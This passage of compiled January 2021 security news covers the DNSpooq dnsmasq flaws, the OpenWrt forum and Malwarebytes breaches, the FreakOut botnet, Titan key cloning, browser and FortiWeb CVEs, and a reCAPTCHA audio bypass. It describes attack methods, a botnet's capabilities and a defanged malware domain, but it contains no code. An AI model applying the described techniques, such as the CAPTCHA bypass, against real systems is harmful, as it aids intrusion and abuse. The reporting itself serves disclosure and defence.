Two messaging apps that Silvanovich examined that did not appear to have any problems with state machines and thus likely do not allow for third-party interception of audio or video were Telegram and Viber, she said.
Telegram seemed to be bug-free “largely because the application does not exchange the offer, answer or candidates until the callee has answered the call,” Silvanovich wrote. However, challenges in reverse-engineering Viber made her analysis “less rigorous” than her examination of the other messaging apps, she acknowledged.
DNSpooq Flaws Allow DNS Hijacking of Millions of Devices
20.1.2021 Hacking Threatpost
Seven flaws in open-source software Dnsmasq could allow DNS cache poisoning attacks and remote code execution.
Researchers have uncovered a set of flaws in dnsmasq, popular open-source software used for caching Domain Name System (DNS) responses for home and commercial routers and servers.
The set of seven flaws are comprised of buffer overflow issues and flaws allowing for DNS cache-poisoning attacks (also known as DNS spoofing). If exploited, these flaws could be chained together to allow remote code execution, denial of service and other attacks.
Researchers have labeled the set of vulnerabilities “DNSpooq,” a combination of DNS spoofing, the concept of “a spook spying on internet traffic,” and the “q” at the end of dnsmasq.
Supply-Chain Security: A 10-Point Audit
Click to Register – New Browser Tab Opens
“DNSpooq is a series of vulnerabilities found in the ubiquitous open-source software dnsmasq, demonstrating that DNS is still insecure, 13 years after the last major attack was described,” said researchers with the JSOF research lab, in a recent analysis.
Dnsmasq is installed on many home and commercial routers and servers in many organizations. The software’s storing of responses to previously asked DNS queries locally speeds up the DNS resolution process; however it has many other uses as well, including providing DNS services to support Wi-Fi hot-spots, enterprise guest networks, virtualization and ad blocking.
Researchers have identified at least 40 vendors who utilize dnsmasq in their products, including Cisco routers, Android phones, Aruba devices, Technicolor and Red Hat, as well as Siemens, Ubiquiti networks, Comcast and many others. In all, “millions” of devices are affected, they said.
DNS Cache Poisoning
Three of the flaws (CVE-2020-25686, CVE-2020-25684 and CVE-2020-25685) could enable DNS cache poisoning.
DNS cache poisoning is a type of attack that enables DNS queries to be subverted. In a real-world situation, an attacker here could use unsolicited DNS responses to poison the DNS cache, convince unknowing internet browsers to a specially-crafted attacker-owned website, and then redirect them to malicious servers.
This could potentially lead to fraud and various other malicious attacks, if victims believe they are browsing to one website but are actually routed to another, said researchers. Other attacks could include phishing attacks or malware distribution.
“Traffic that might be subverted includes regular Internet browsing as well as other types of traffic, such as emails, SSH, remote desktop, RDP video and voice calls, software updates and so on,” said researchers.
Buffer Overflow
Researchers also shed light on four buffer-overflow vulnerabilities (CVE-2020-25687, CVE-2020-25683, CVE-2020-25682 and CVE-2020-25681) in dnsmasq. The memory-corruption flaws can be triggered by a remote attacker using crafted DNS responses. The attack can lead to denial of service, information exposure and potentially remote code execution.
While the majority of these flaws are heap-based buffer-overflow issues that could lead to denial of service, one of the flaws is a high-severity issue that could potentially enable remote code execution when dnsmasq is configured to use domain name system security extensions (DNSSEC), a set of protocols that add a layer of security to the domain name system.
“For the buffer overflows and remote-code execution, devices that don’t use the DNSSEC feature will be immune,” said researchers. “DNSSEC is a security feature meant to prevent cache poisoning attacks and so we would not recommend turning it off, but rather updating to the newest version of dnsmasq.”
Researchers said that the approximately 1 million dnsmasq servers openly visible on the internet (according to Shodan) make attacks launched via the internet “very simple,” and that there are several real-world scenarios that set up an attacker to exploit these flaws.
“This may be possible in some cases, (we believe rare), even if the forwarder is not open to the internet,” they said.
Also, if a dnsmasq server is only configured to listen to connections received from within an internal network – and an attacker gains a foothold on any device in that network – they would be able to perform the attack. Or, if a dnsmasq server is only configured to listen to connections received from within an internal network but the network is open (including an airport network or a corporate guest network) an attacker could perform the attack.
The Impact
The flaws have varying severity, with CVE-2020-25681 and CVE-2020-25682 being high severity. However, researchers said if these vulnerabilities were chained together they could lead to an array of multi-stage attacks.
“This is because exploiting some of the vulnerabilities makes it easier to exploit others,” said researchers. “For example, we found that combining CVE-2020-25682, CVE-2020-25684, and CVE-2020-25685 would result in CVE-2020-25682 having a lower attack complexity (with the same impact) and result in a combined CVSS of 9.8 according to our analysis.”
Researchers disclosed the flaws in August and publicly revealed them this month. These vulnerabilities are addressed in dnsmasq 2.83; users of internet-of-things (IoT) and embedded devices that use dnsmasq should contact their vendors for further information regarding updates.
“With the help of CERT/CC and volunteers from several companies, a working group was formed, combining the expertise and extended reach of members from JSOF, CERT/CC, Cisco, Google, Red Hat, Pi-hole and Simon Kelley, the maintainer of dnsmasq, to ensure that the DNSpooq vulnerabilities would be effectively fixed and well documented and communicated,” said researchers.
Attackers Steal E-Mails, Info from OpenWrt Forum
20.1.2021 Hacking Threatpost
Users of the Linux-based open-source firmware—which include developers from commercial router companies–may be targeted by phishing campaigns, administrators warn.
The forum supporting the community for OpenWrt suffered a security breach over the weekend, giving hackers access to e-mail addresses, user handles and additional private forum user information.
Those that maintain the forum for the Linux-based open-source firmware said the forum was breached in the early hours of Saturday Jan. 16, though how attackers got in remains unknown, according to a security notice posted to the forum’s home page. While the account had “a good password,” administrators acknowledged that the forum did not enable two-factor authentication for its users.
While the breach of an open-source forum may not seem on the surface like such a big deal, the forum is often visited by those developing commercial routers, devices and software based on OpenWrt firmware. Targeting these users, then, could be used as a gateway into these companies’ networks by threat actors. Commercial routers compatible with OpenWrt firmware include devices from Netgear, Zyxel, TP-Link and Linksys.
“The intruder was able to download a copy of the user list that contains email addresses, handles, and other statistical information about the users of the forum,” according to the notice, which also was sent out via a mailing list to forum users. This means that users should assume that their email address and handle have been disclosed and “may get phishing emails that include your name,” administrators said.
The OpenWrt Project is a Linux operating system for embedded devices that provides “a fully writable filesystem with package management,” according to its home page. Its basic components are Linux, util-linux, musl and BusyBox, all of which have been designed specifically to suit the memory and storage available on home networking devices.
OpenWrt provides a framework to build an application without having to develop a complete firmware around it, so users can provide customization for devices in ways that proprietary systems don’t offer, according to its administrators. Developers cite real-time network management, increased network stability, advanced wireless set-up, VPN integration, and increased network speed and security as some of the benefits of using OpenWrt.
Though those that maintain the forum do not believe that attackers accessed the OpenWrt database, they advised users of the community to reset all passwords, providing specific details in the security notice for the proper procedure to do so. They also have flushed API keys from the forum, according to the notice.
Administrators also advised users to reset and refresh any Github login or OAuth key, if they use it to access the forum. However, since OpenWrt forum credentials are entirely independent of the OpenWrt Wiki that users access for information and updates about the platform, “there is no reason to believe there has been any compromise to the Wiki credentials,” administrators said.
“We apologize for the inconvenience caused by this attack,” they said in the notice. “We will provide updates if we learn any more about the attacker or information that was disclosed.
Malwarebytes ‘s email systems hacked by SolarWinds attackers
20.1.2021 Hacking Securityaffairs
Cyber security firm Malwarebytes announced that threat actor behind the SolarWinds attack also breached its network last year.
Malwarebytes revealed today that SolarWinds hackers also breached its systems and gained access to its email. Malwarebytes joins the club of security firms that were hit by Solarwinds attackers, after FireEye, Microsoft, and CrowdStrike.
The intrusion took place last year, the company pointed out that hackers exploited another attack vector and did use SolarWinds Orion software.
The intruders compromised some internal systems by exploiting a weakness in Azure Active Directory and abused malicious Office 365 applications.
“While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor. We can confirm the existence of another intrusion vector that works by abusing applications with privileged access to Microsoft Office 365 and Azure environments.” reads the post published by malwarebytes. “After an extensive investigation, we determined the attacker only gained access to a limited subset of internal company emails. We found no evidence of unauthorized access or compromise in any of our internal on-premises and production environments.”
On December 15, Microsoft Security Response Center warned the security firm of suspicious activity from a third-party application in its Microsoft Office 365 tenant. The activity was consistent with the tactics, techniques, and procedures (TTPs) of the SolarWinds attackers.
Malwarebytes said it learned of the intrusion from the Microsoft Security Response Center (MSRC) on December 15.
With the support of Microsoft’s Detection and Response Team (DART), Malwarebytes discovered that the attackers leveraged a dormant email protection product within our Office 365 tenant that allowed access to a limited subset of internal company emails. The security firms explained that it does not use Azure cloud services in its production environments.
Malwarebytes performed a deep investigation through its infrastructure, inspecting its source code, build and delivery processes, but it confirmed that internal systems showed no evidence of unauthorized access or compromise. This means that the customers of the security firm were not impacted using its anti-malware solution.
“While we have learned a lot of information in a relatively short period of time, there is much more yet to be discovered about this long and active campaign that has impacted so many high-profile targets,” concludes the company.
“It is imperative that security companies continue to share information that can help the greater industry in times like these, particularly with such new and complex attacks often associated with nation state actors.”
Malwarebytes ‘s email systems hacked by SolarWinds attackers
20.1.2021 Hacking Securityaffairs
Cyber security firm Malwarebytes announced that threat actor behind the SolarWinds attack also breached its network last year.
Malwarebytes revealed today that SolarWinds hackers also breached its systems and gained access to its email. Malwarebytes joins the club of security firms that were hit by Solarwinds attackers, after FireEye, Microsoft, and CrowdStrike.
The intrusion took place last year, the company pointed out that hackers exploited another attack vector and did use SolarWinds Orion software.
The intruders compromised some internal systems by exploiting a weakness in Azure Active Directory and abused malicious Office 365 applications.
“While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor. We can confirm the existence of another intrusion vector that works by abusing applications with privileged access to Microsoft Office 365 and Azure environments.” reads the post published by malwarebytes. “After an extensive investigation, we determined the attacker only gained access to a limited subset of internal company emails. We found no evidence of unauthorized access or compromise in any of our internal on-premises and production environments.”
On December 15, Microsoft Security Response Center warned the security firm of suspicious activity from a third-party application in its Microsoft Office 365 tenant. The activity was consistent with the tactics, techniques, and procedures (TTPs) of the SolarWinds attackers.
Malwarebytes said it learned of the intrusion from the Microsoft Security Response Center (MSRC) on December 15.
With the support of Microsoft’s Detection and Response Team (DART), Malwarebytes discovered that the attackers leveraged a dormant email protection product within our Office 365 tenant that allowed access to a limited subset of internal company emails. The security firms explained that it does not use Azure cloud services in its production environments.
Malwarebytes performed a deep investigation through its infrastructure, inspecting its source code, build and delivery processes, but it confirmed that internal systems showed no evidence of unauthorized access or compromise. This means that the customers of the security firm were not impacted using its anti-malware solution.
“While we have learned a lot of information in a relatively short period of time, there is much more yet to be discovered about this long and active campaign that has impacted so many high-profile targets,” concludes the company.
“It is imperative that security companies continue to share information that can help the greater industry in times like these, particularly with such new and complex attacks often associated with nation state actors.”
FreakOut botnet target 3 recent flaws to compromise Linux devices
20.1.2021 Hacking Securityaffairs
Security researchers uncovered a series of attacks conducted by the FreakOut botnet that leveraged recently discovered vulnerabilities.
Security researchers from Check Point have uncovered a series of attacks associated with the FreakOut botnet that is targeting multiple unpatched flaws in applications running on top of Linux systems.
The botnet appeared in the threat landscape in November 2020, in some cases the attacks leveraged recently disclosed vulnerabilities to inject OS commands. The attacks aimed at compromising the tarted systems to create an IRC botnet, which can later be used to conduct several malicious activities, including DDoS attacks and crypto-mining campaign.
The attacks observed by Check Point aimed at devices that run one of the following products:
TerraMaster TOS(TerraMaster Operating System) – the operating system used for managing TerraMaster NAS (Network Attached Storage) servers
Zend Framework – a collection of packages used in building web application and services using PHP, with more than 570 million installations
Liferay Portal – a free, open-source enterprise portal. It is a web application platform written in Java that offers features relevant for the development of portals and websites
Once infected a device, it will be later used as an attacking platform.
FreakOut botnet
Botnet operators are scanning the internet for vulnerable applications affected by one of the recently disclosed vulnerabilities and take over the underlying Linux system:
CVE-2020-28188 – RCE flaw that resides in the TerraMaster management panel (disclosed on December 24, 2020) – This flaw could be exploited by a remote unauthenticated attacker to inject OS commands, and gain control of the servers using TerraMaster TOS (versions prior to 4.2.06).
CVE-2021-3007 – deserialization flaw that affects the Zend Framework (disclosed on January 3, 2021). The flaw affects Zend Framework versions higher than 3.0.0, the attacker can abuse the Zend3 feature that loads classes from objects to upload and execute malicious code in the server. The code can be uploaded using the “callback” parameter, which in this case inserts a malicious code instead of the “callbackOptions” array.
CVE-2020-7961 – Java unmarshalling flaw via JSONWS in Liferay Portal (in versions prior to 7.2.1 CE GA2) (disclosed on March 20, 2020). An attacker can exploit the flaw to provide a malicious object, that when unmarshalled, allows remote code execution.
“In all the attacks involving these CVEs, the attacker’s first move is to try running different syntaxes of OS commands to download and execute a Python script named “out.py”.” reads the analysis published by Check Point. “After the script is downloaded and given permissions (using the “chmod” command), the attacker tries to run it using Python 2. Python 2 reached EOL (end-of-life) last year, meaning the attacker assumes the victim’s device has this deprecated product installed.”
The bot is an obfuscated Python script downloaded from the site https://gxbrowser[.]net consisting of polymorphic code.
The FreakOut botnet has a modular structure, it uses a specific function for each capability it supports. Below a list of functions implemented in the botnet:
Port Scanning utility
Collecting system fingerprint
Includes the device address (MAC, IP), and memory information. These are used in different functions of the code for different checks
TerraMaster TOS version of the system
Creating and sending packets
ARP poisoning for Man-in-the-Middle attacks.
Supports UDP and TCP packets, but also application layer protocols such as HTTP, DNS, SSDP, and SNMP
Protocol packing support created by the attacker.
Brute Force – using hard coded credentials
With this list, the malware tries connecting to other network devices using Telnet. The function receives an IP range and tries to brute force each IP with the given credential. If it succeeds, the results of the correct credential are saved to a file, and sent in a message to the C2 server
Handling sockets
Includes handling exceptions of runtime errors.
Supports multi-threaded communication to other devices. This allows simultaneous actions the bots can perform while listening to the server
Sniffing the network
Executes using the “ARP poisoning” capability. The bot sets itself as a Man-in-the-Middle to other devices. The intercepted data is sent to the C2 server
Spreading to different devices, using the “exploit” function.
Randomly generates the IPs to attack
Exploits the CVEs mentioned above (CVE-2020-7961 , CVE-2020-28188, CVE-2021-3007)
Gaining persistence by adding itself to the rc.local configuration.
DDOS and Flooding – HTTP, DNS, SYN
Self-implementation of Slowlaris. The malware creates many sockets to a relevant victim address for the purpose of instigating a DDoS attack
Opening a reverse-shell – shell on the client
Killing a process by name or ID
Packing and unpacking the code using obfuscation techniques to provide random names to the different functions and variables.
The botnet could conduct multiple malicious activities by combining the above functions, such as delivering a cryptocurrency miners, launching DDoS, ot spreading laterally across the company network.
Check Point researchers analyzed the malicious code and were able to access the IRC channel used by the botmaster to control the botnet.
The botnet is in an early stage, at the time of the analysis, the IRC panel shows it was controlling only 188 bots.
Check Point experts were also able to track its author, who goes online with the moniker Freak.
“To identify the threat actors responsible for the attacks, we searched for leads in the internet and social media. Searching for both the code author, who goes by the name “Freak” (which we have also seen in the IRC server channels) and the IRC bot name “N3Cr0m0rPh”, revealed information about the threat actor behind the campaign.” continues the analysis.
“In a post published on HackForums back in 2015, submitted by the user “Fl0urite” with the title “N3Cr0m0rPh Polymorphic IRC BOT”, the bot is offered for sale in exchange for BitCoins (BTC).”
The analysis published by the experts includes the MITRE ATT&CK TECHNIQUES and protections (IoCs, IPS, and Anti-Bot).
OpenWRT forum hacked, intruders stole user data
19.1.2021 Hacking Securityaffairs
The OpenWRT forum, the community behind the open-source project for embedded operating systems based on Linux, disclosed a data breach.
OpenWrt is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic. The main components are Linux, util-linux, musl, and BusyBox. All components have been optimized to be small enough to fit into the limited storage and memory available in home routers.
OpenWRT forum was compromised during the weekend and user data were stolen by intruders.
The administrators of the forum disclosed the data breach with an announcement published on the forum.
The attack took place on Saturday, around 04:00 (GMT), when threat actors compromised an administrator account and downloaded a copy of the list of users.
“Around 0400 GMT on 16 Jan 2021, an administrator account on the OpenWrt forum (https://forum.openwrt.org) was breached. It is not known how the account was accessed: the account had a good password, but did not have two-factor authentication enabled.” states the data breach notification published by the administrators of the forum. “The intruder was able to download a copy of the user list that contains email addresses, handles, and other statistical information about the users of the forum. Although we do not believe the intruder could download the database, from an abundance of caution, we are following the advice of the Discourse community and have reset all passwords on the Forum, and flushed any API keys.”
The list contains email addresses, handles, and other statistical information about the users of the forum. According to the announcement, the compromised account was using a “a good password,” but it was not using two-factor authentication (2FA).
Administrators do not believe the attackers have downloaded the database of the forum containing users’ credentials.
However, with an abundance of caution, forum administrators reset all passwords and flushed any API keys.
Users have to reset their password manually on https://forum.openwrt.org.
and following the “get a new password” instructions. If users use Github login/OAuth key, they should reset/refresh it.
The notice states that OpenWrt forum credentials are separate from OpenWrt Wiki (https://openwrt.org), this means that the data breach did not compromise Wiki credentials.
OpenWRT administrators warn of phishing attempts against forum users.
“You should assume that your email address and handle have been disclosed. That means you may get phishing emails that include your name. DO NOT click links, but instead manually type the URL of the forum as above.” states the advisory.
Expired Domain Allowed Researcher to Hijack Country's TLD
19.1.2021 Hacking Securityweek
A researcher claimed last week that he managed to take control of the country code top-level domain (ccTLD) for the Democratic Republic of Congo after an important domain name was left to expire.
Before the holidays, Fredrik Almroth, founder and researcher at web security company Detectify, decided to analyze the name server (NS) records used by all TLDs. These NS records specify the servers for a DNS zone.
He noticed that a domain named scpt-network.com, which had been listed as a name server for .cd, the TLD for Congo, had been left to expire. Almroth realized that the domain could be highly valuable to a bad actor so he quickly acquired it himself to prevent abuse.
The remaining name servers managing the .cd TLD belonged to South African Internet eXchange (SAIX), which kept the TLD operational. However, gaining control over the scpt-network.com domain could have still allowed a malicious actor to hijack half of the DNS traffic for .cd websites.
Almroth believes the impact could have been significant considering that the African country has a population of approximately 90 million people, as well as the fact that many international organizations have a .cd website.
The researcher noted that a threat actor could have redirected DNS traffic from legitimate sites to phishing or other malicious websites, they could have passively intercepted DNS traffic for surveillance purposes or data exfiltration, or they could have used it for fast fluxing, to hide malicious websites.
Hackers could have also abused this access for remote code execution on local networks, they could have taken control of the domains of high-profile organizations, or they could have launched DDoS attacks against a specific target. They could have also disrupted much of the TLD, Almroth said.
In a blog post published last week, the researcher provided examples of how some of these attacks could have been carried out.
Almroth has been trying to return scpt-network.com to its rightful owner and, in the meantime, name servers have been replaced with scpt-network.net by the administrators of the TLD, who were notified by the researcher in early January.
“The potential implications for DNS hijacking of a ccTLD are widespread and have extreme negative consequences, especially if the attacker has bad intentions,” Almroth explained in his blog post. “This vulnerability affects more than a single website, subdomain, or even a single apex domain. All .cd websites, including those for major international companies, financial institutions, and other organizations that have a .cd domain in Africa’s second most populous country could have fallen victim to abuse, including phishing, MITM, or DDoS.”
EMA said that hackers manipulated stolen documents before leaking them
18.1.2021 Hacking Securityaffairs
The European Medicines Agency (EMA) revealed Friday that COVID-19 vaccine documents stolen from its servers have been manipulated before the leak.
The European Medicines Agency (EMA) declared that COVID-19 vaccine documents stolen from its servers in a recent cyber attack have been manipulated.
In December, a cyber attack hit the European Medicines Agency (EMA). At the time of the disclosure of the hack, the EMA did not provide technical details about the attack, nor whether it will have an impact on its operations while it is evaluating and approving COVID-19 vaccines.
The European agency plays a crucial role in the evaluation of COVID-19 vaccines across the EU, it has access to sensitive and confidential information, including quality, safety, and effectivity data resulting from trials.
Nation-state actors consider organizations involved in the research of the vaccine a strategic target to gather intelligence on the ongoing response of the government to the pandemic. At the end of November, the Reuters agency revealed in an exclusive that the COVID vaccine maker AstraZeneca was targeted by alleged North Korea-linked hackers.
After the attack, Pfizer and BioNTech issued a joint statement that confirms that some documents related to their COVID-19 submissions were accessed by the threat actors.
Last week, the European Medicines Agency (EMA) revealed threat actors have stolen some of the Pfizer/BioNTech COVID-19 vaccine data and leaked it leaked online.
The agency added that the European medicines regulatory network is fully functional and that the cyber attack had no impact on COVID-19 evaluation and approval timelines.
The investigation conducted by the European Medicines Agency showed that threat actors manipulated emails and documents related to the evaluation of experimental COVID-19 vaccines before leaking them online.
The manipulation of the documents is part of a disinformation campaign aimed at raising doubts about the vaccine and the work of the EMA.
“Some of the correspondence has been manipulated by the perpetrators prior to publication in a way which could undermine trust in vaccines,” the Netherlands-based agency said.
“We have seen that some of the correspondence has been published not in its integrity and original form and, or with, comments or additions by the perpetrators.”
Multiple security firms, such as Cyble and Yarix, have found leaks on underground forums.
“During the assessment of data, our researchers noticed that multiple confidential files, including MoMs, assessment reports, confidential emails, login portal links and images of its internal pages were accessed and leaked.” reported the analysis published by Cyble.
The experts shared screenshots of the internal email where the portal link was shared, the login page for the portal to access the reports, and images of internal pages.
The documents also include the alleged assessment report of COVID-19 vaccine along with the summary report of drug release and stability.
Law enforcement authorities are still investigating the security incident.
Researchers Show Google's Titan Security Keys Can Be Cloned
12.1.2021 Hacking Securityweek
Researchers have found a way to clone Google’s Titan Security Keys through a side-channel attack, but conducting an attack requires physical access to a device for several hours, as well as technical skills, custom software, and relatively expensive equipment.
Security key devices are considered highly efficient when it comes to protecting accounts against takeover attempts and, unlike other types of two-factor authentication (2FA) systems, they are much more difficult to compromise. They are recommended for securing very important accounts as they make it very difficult for attackers to access the targeted user’s account even if they have phished their credentials and compromised their mobile phone, which is often used as part of the multi-factor authentication process.
Titan security key
A new attack method against such devices was described by researchers from NinjaLab, a France-based company that specializes in the security of cryptographic implementations. They conducted experiments on the Google Titan Security Key’s secure element, namely the NXP A700X chip, and Rhea, an NXP J3D081 Java Card that is freely available on the web and which uses the same cryptographic library.
The method was validated in the summer of 2020 and it was reported to Google and Dutch-American semiconductor manufacturer NXP in early October. Google has acknowledged the research, but determined that it does not qualify for a bug bounty due to the fact that the vulnerability exists in the NXP product.
According to NinjaLab, in addition to Titan devices and NXP Java Card chips, the attack also works against a Yubico Yubikey model that is no longer offered for sale — newer Yubico products do not appear to be impacted — and Feitian-branded security keys. Feitian is the company that makes Google's Titan key, but it also sells them under its own brand.
Conducting an attack involves acquiring electromagnetic (EM) radiations from the NXP chip during ECDSA (Elliptic Curve Digital Signature Algorithm) signatures, which is the core crypto operation of the FIDO U2F protocol. The attack leverages what researchers described as a side-channel vulnerability in the ECDSA signature implementation (CVE-2021-3011).
The researchers said it took 4 hours to acquire 4,000 side-channel traces of the U2F authentication request command on the Rhea device, and 6 hours to monitor 6,000 operations on the Titan, which allowed them to extract the ECDSA private key linked to an account.
The obtained encryption key can allow an attacker to clone the device and use it to log in to the targeted user’s account, assuming that they have also obtained the account username and password.
However, the researchers pointed out that an attack is not easy to conduct. First of all, the attacker would need to obtain the victim’s security key for several hours without raising suspicion — the victim could change the password or take other steps to secure their account if they notice that their security key is missing and they suspect that an attack on their account is imminent.
The attacker then needs to open the Titan Security Key casing without damaging the chip, perform the EM radiation analysis (which takes several hours), and create a clone of the security key. The researchers also highlighted that the equipment needed to conduct the analysis costs roughly €10,000 ($12,000), and the attacker would also need to have the technical skills to develop custom software and conduct an attack.
“Thus it is still clearly far safer to use your Google Titan Security Key (or other impacted products) as FIDO U2F two-factor authentication token to sign in to applications like your Google account rather than not using one,” the researchers explained in their paper. “Nevertheless, this work shows that the Google Titan Security Key (or other impacted products) would not avoid unnoticed security breach by attackers willing to put enough effort into it. Users that face such a threat should probably switch to other FIDO U2F hardware security keys, where no vulnerability has yet been discovered.”
Bugs in Firefox, Chrome, Edge Allow Remote System Hijacking
8.1.2021 Hacking Threatpost
Major browsers get an update to fix separate bugs that both allow for remote attacks, which could potentially allow hackers to takeover targeted devices.
Makers of the Chrome, Firefox and Edge browsers are urging users to patch critical vulnerabilities that if exploited allow hackers to hijack systems running the software.
The Mozilla Firefox vulnerability (CVE-2020-16044) is separate from a bug reported in Google’s browser engine Chromium, which is used in the Google Chrome browser and Microsoft’s latest version of its Edge browser.
Critical Firefox Use-After-Free Bug
On Thursday, the Cybersecurity and Infrastructure Security Agency (CISA) urged users of Mozilla Foundation’s Firefox browser to patch a bug, tracked as CVE-2020-16044, and rated as critical. The vulnerability is classified as a use-after-free bug and tied to the way Firefox handles browser cookies and if exploited allows hackers to gain access to the computer, phone or tablet running the browser software.
Impacted is the desktop Firefox browser version 84.0.2, Firefox Android 84.1.3 edition and also Mozilla’s corporate ESR 78.6.1 version of Firefox.
“A malicious peer could have modified a COOKIE-ECHO chunk in a SCTP packet in a way that potentially resulted in a use-after-free. We presume that with enough effort it could have been exploited to run arbitrary code,” according to a Mozilla security bulletin posted Thursday.
2020 Reader Survey: Share Your Feedback to Help Us ImproveThe acronym SCTP stands for Stream Control Transmission Protocol, used in computer networking to communicate protocol data within the Transport Layer of the internet protocol suite, or TCP/IP. The bug is tied to the way cookie data is handled by SCTP.
Each inbound SCTP packet contains a cookie chunk that facilitates a corresponding reply from the browser’s cookie. A COOKIE ECHO chunk is a snippet of data sent during the initialization of the SCTP connection with the browser.
According to Mozilla an adversary could craft a malicious COOKIE-ECHO chunk to impact the browser’s memory. A use-after-free vulnerability relates to incorrect use of dynamic memory during program operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to hack the program,” according to a description of the vulnerability.
Mozilla did not credit the bug discovery, nor did it state whether it was a vulnerability actively being exploited in the wild.
Chromium Browser Bug Impacts Chrome and Edge
Also on Thursday, CISA urged Windows, macOS and Linux users of Google’s Chrome browser to patch an out-of-bounds write bug (CVE-2020-15995) impacting the current 87.0.4280.141 version of the software. The CISA-bug warning stated that the update to the latest version of the Chrome browser would “addresses vulnerabilities that an attacker could exploit to take control of an affected system.”
Because Microsoft’s latest Edge browser is based on Google Chromium browser engine, Microsoft also urged its users to update to the latest 87.0.664.75 version of its Edge browser.
web browsers chrome firefox and edgeWhile researchers at Tenable classify the out-of-bounds bug as critical, both Google and Microsoft classified the vulnerability as high severity. Tencent Security Xuanwu Lab researcher Bohan Liu is credited for finding and reporting the bug.
Interestingly, the CVE-2020-15995 bug dates back to a Chrome for Android update security bulletin Google’s published on October 2020. At the time, the bug was also classified as high-severity. The flaw is identified as an “out of bounds write in V8”, bug originally found in September 2020 by Liu.
V8 is Google’s open-source and high-performance JavaScript and WebAssembly engine, according to a Google developer description. While the technical specifics of the bug are not available, similar out of bounds write in V8 bugs have allowed remote attackers to exploit a heap corruption via a crafted HTML page.
A heap corruption is a type of memory corruption that occurs in a computer program when the contents of a memory location are modified due to programmatic behavior that exceeds the intention of the original programmer or program/language constructs. A so-called heap-smashing attack can be used to exploit instances of heap corruption, according to an academic paper (PDF) co-authored by Nektarios Georgios Tsoutsos, student member of IEEE and Michail Maniatakos, senior member of IEEE.
“Heap Smashing Attacks exploit dynamic memory allocators (e.g. ,malloc) by corrupting the control structures defining the heap itself. By overflowing a heap block, attackers could overwrite adjacent heap headers that chain different heap blocks, and eventually cause the dynamic memory allocator to modify arbitrary memory locations as soon as a heap free operation is executed. The malicious payload can also be generated on-the-fly: for example, by exploiting Just-In-Time (JIT) compilation, assembled code can be written on the heap,” they wrote.
Neither Microsoft nor Google explain why the October 2020 CVE-2020-15995 is being featured again in both their Thursday security bulletins. Typically, that’s an indication that the original fix was incomplete.
More Chromium Bugs Impact Chrome and Edge
Twelve additional bugs were reported by Google, impacting its Chromium browser engine. Both Google and Microsoft featured the same list of vulnerabilities (CVE-2021-21106, CVE-2021-21107, CVE-2021-21108, CVE-2021-21109, CVE-2021-21110, CVE-2021-21111, CVE-2021-21112, CVE-2021-21113, CVE-2021-21114, CVE-2021-21115, CVE-2021-21116, CVE-2020-16043).
The majority of the bugs were rated high-severity and tied to use-after-free bugs. Three of the vulnerabilities earned bug hunters $20,000 for their efforts. Weipeng Jiang from Codesafe Team of Legendsec at Qi’anxin Group is credited for finding both $20,000 bugs (CVE-2021-21106 and CVE-2021-21107). The first, a use-after-free bug tied to Chromium’s autofill function and the second a use-after-free bug in the Chromium media component.
Leecraso and Guang Gong of 360 Alpha Lab earned $20,000 for a CVE-2021-21108, also a use-after-free bug in the browser’s media component.
No technical details were disclosed and typically aren’t until its determined that most Chrome browsers have been updated.
Multiple flaws in Fortinet FortiWeb WAF could allow corporate networks to hack
8.1.2021 Hacking Securityaffairs
An expert found multiple serious vulnerabilities in Fortinet’s FortiWeb web application firewall (WAF) that could expose corporate networks to hack.
Andrey Medov, a security researcher at Positive Technologies, found multiple serious vulnerabilities in Fortinet’s FortiWeb web application firewall (WAF) that could be exploited by attackers to hack into corporate networks.
The flaws, tracked as CVE-2020-29015, CVE-2020-29016, CVE-2020-29018, and CVE-2020-29019, have been already addressed by Fortinet with the release of security patches.
The vulnerabilities include a blind SQL injection, a stack-based buffer overflow issue, an overflow buffer overflow, and a format string vulnerability that could lead to the execution of unauthorized code or commands or denial-of-service (DoS) conditions.
The flaws reside in the FortiWeb administration interface, this means that a remote attacker could exploit them to potentially access the corporate network.
“A stack-based buffer overflow vulnerability in FortiWeb may allow an unauthenticated, remote attacker to overwrite the content of the stack and potentially execute arbitrary code by sending a crafted request with a large certname.” reads the PSIRT advisory for the CVE-2020-29016.
The vendor recommends the customers to upgrade to FortiWeb versions:
6.2.4 or above to address the CVE-2020-29015 flaw
6.3.6 or above to address the CVE-2020-29016 and CVE-2020-29018
6.3.8 or above to address the CVE-2020-29019
Researcher Breaks reCAPTCHA With Google’s Speech-to-Text API
5.1.2021 Hacking Threatpost
Researcher uses an old unCAPTCHA trick against latest the audio version of reCAPTCHA, with a 97 percent success rate.
An old attack method dating back to 2017 that uses voice-to-text to bypass CAPTCHA protections turns out to still work on Google’s latest reCAPTCHA v3.
That’s according to researcher Nikolai Tschacher, who posted a video proof-of-concept (PoC) of the attack on Jan. 2.
CAPTCHA, introduced in 2014, is an acronym for Completely Automated Public Turing Test to Tell Computers and Humans Apart. ReCaptcha is Google’s name for its own technology and free service that uses image, audio or text challenges to verify that a human is signing into an account. It’s a bit of code available free of charge from Google for accounts that handle less than 1 million queries a month. Google recently started charging for larger reCAPTCHA accounts.
“The idea of the attack is very simple: You grab the MP3 file of the audio reCAPTCHA and you submit it to Google’s own speech-to-text API,” Tschacher wrote. “Google will return the correct answer in over 97 percent of all cases.”
reCAPTCHA — an automated Turing Test.
The report includes a video showing how Tschacher’s bot works. He added that this attack method works on even the latest version, reCAPTCHA v3.
Google did not immediately respond to Threatpost’s request for comment on the report.
Tschacher pointed out that his bot wouldn’t be easy to exploit at scale for three specific reasons: Google rate-limits audio CAPTCHA access; Google is likely tracking bot metrics; and, it creates a fingerprint of each browsing device to stop bots.
“But still, we are approaching a point in time were the Turing Test can be solved by advanced AI, thus making CAPTCHAs harder and harder to implement,” Tschacher told Threatpost. “CAPTCHAs will be replaced by passive AI that collects all kinds of data to constantly determine of the browsing signal appears to be human or not. The decision will be based on browsing fingerprint, JavaScript user
interaction events such as mouse movements and key presses and IP-address metadata.”
CAPTCHA, ReCAPTCHA, UnCAPTCHA
The idea of using speech-to-text against CAPTCHA protections was first introduced in 2017 by researchers at the University of Maryland, who then reported they “achieved 85 percent accuracy” with the tech they dubbed “UnCAPTCHA.”
Audio reCAPTCHA. Click to enlarge.
